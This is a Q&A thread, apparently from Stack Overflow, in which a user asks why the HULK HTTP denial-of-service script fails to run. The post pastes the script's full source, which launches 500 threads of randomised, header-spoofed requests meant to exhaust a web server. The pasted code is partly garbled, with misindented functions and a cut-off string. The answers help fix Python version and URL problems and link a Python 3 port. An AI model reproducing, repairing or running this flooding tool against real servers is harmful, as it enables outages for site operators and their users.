# How to solve syntax errors from hulk.py?

Tags: python, python-2.7, load-testing

I am running hulk.py script on my local server. I am not able to execute this script successfully.

I have downloaded hulk.py from url: "https://github.com/grafov/hulk"

Steps I did:

1. Extracted downloaded file on desktop
2. from command prompt,i have navigated to this extracted folder
3. Ran command "hulk.py https://"

Below Error displayed:

```
File "C:\Users\Abhishek Asopa\Desktop\hulk-master\hulk-master\hulk.py", line 72
print '---------------------------------------------------'
                                                          ^
SyntaxError: Missing parentheses in call to 'print'
```

Below is code of hulk.py:

```
# ----------------------------------------------------------------------------------------------
# HULK - HTTP Unbearable Load King
#
# this tool is a dos tool that is meant to put heavy load on HTTP servers in      order to bring them
# to their knees by exhausting the resource pool, its is meant for research     purposes only
# and any malicious usage of this tool is prohibited.
#
# author :  Barry Shteiman , version 1.0
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re

#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0

def inc_counter():
    global request_counter
    request_counter+=1

def set_flag(val):
    global flag
    flag=val

def set_safe():
    global safe
    safe=1

    # generates a user agent array
    def useragent_list():
    global headers_useragents
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US;     rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en;     rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-    US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-    US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-    US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT     6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT     6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR     3.5.30729; .NET CLR 3.0.30729)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT     5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

# generates a referer array
def referer_list():
    global headers_referers
    headers_referers.append('http://www.google.com/?q=')
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
        headers_referers.append('http://' + host + '/')
        return(headers_referers)

#builds random ascii string
def buildblock(size):
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def usage():
    print '---------------------------------------------------'
    print 'USAGE: python hulk.py <url>'
    print 'you can add "safe" after url, to autoshut after dos'
    print '---------------------------------------------------'


#http request
def httpcall(url):
    useragent_list()
    referer_list()
    code=0
    if url.count("?")>0:
        param_joiner="&"
    else:
        param_joiner="?"
    request = urllib2.Request(url + param_joiner +     buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) +     buildblock(random.randint(5,10)))
    request.add_header('Keep-Alive', random.randint(110,120))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host',host)
    try:
            urllib2.urlopen(request)
    except urllib2.HTTPError, e:
            #print e.code
            set_flag(1)
            print 'Response Code 500'
            code=500
    except urllib2.URLError, e:
            #print e.reason
            sys.exit()
    else:
            inc_counter()
            urllib2.urlopen(request)
    return(code)        


#http caller thread 
class HTTPThread(threading.Thread):
    def run(self):
        try:
            while flag<2:
                code=httpcall(url)
                if (code==500) & (safe==1):
                    set_flag(2)
        except Exception, ex:
            pass

# monitors http threads and counts requests
class MonitorThread(threading.Thread):
    def run(self):
        previous=request_counter
        while flag==0:
            if (previous+100<request_counter) & (previous<>request_counter):
                print "%d Requests Sent" % (request_counter)
                previous=request_counter
        if flag==2:
            print "\n-- HULK Attack 

#execute 
    if len(sys.argv) < 2:
        usage()
        sys.exit()
else:
    if sys.argv[1]=="help":
        usage()
        sys.exit()
    else:
        print "-- HULK Attack Started --"
        if len(sys.argv)== 3:
            if sys.argv[2]=="safe":
                set_safe()
        url = sys.argv[1]
        if url.count("/")==2:
            url = url + "/"
        m = re.search('http\://([^/]*)/?.*', url)
        host = m.group(1)
        for i in range(500):
            t = HTTPThread()
            t.start()
        t = MonitorThread()
        t.start()
```

Can you please tell me what would be the correct script/syntax if this is not right one?

Answer (score 2):

It sounds like you are trying to run the script with Python 3 which treats print as a function requiring parentheses around the string.   I'd

1. Try running it using Python 2
2. Modify the print statement to contain parentheses, there might be other problems but you can see if the error moves.
3. If it is a Python 2/3 problem, try running 2to3 on the hulk.py source.

Comment: I have tried with 2.7.10, its giving below error:


-- HULK Attack Started --
Traceback (most recent call last):
  File "C:\Python27\hulk.py", line 150, in <module>
    host = m.group(1)
AttributeError: 'NoneType' object has no attribute 'group'

Comment: After looking at the hulk.py source, this error indicates that the regex search on a previous line did not find the parameter url in the given regular expression.   The url parameter is provided as a command line argument, obtained through sys.argv[1] are you providing this when you exectue the script?

Answer (score 1):

You are using Python 3 and this tool is for Python 2

Comment: I have tried with 2.7.10, Its giving below error:

    -- HULK Attack Started --
    Traceback (most recent call last):
      File "C:\Python27\hulk.py", line 150, in <module>
        host = m.group(1)
    AttributeError: 'NoneType' object has no attribute 'group'

Comment: anything else i should do ?

Comment: you said the command you ran was `hulk.py https://` but, looking at the regex the script wants something like `hulk.py http://<site url>`. So you need to specify the protocol prefix `http://`. I don't know how hulk behaves with https, but you can try what happens with http and specify the port in the url.

Comment: I tried doing so. I kept "Http" in place of "Https", it doesn't opens expected URL.

Answer (score 0):

it seems you are running hulk with python 3
try to run it with python 2 or use the improved python 3 version of [hulk](https://github.com/iamaamir/ihulk.py).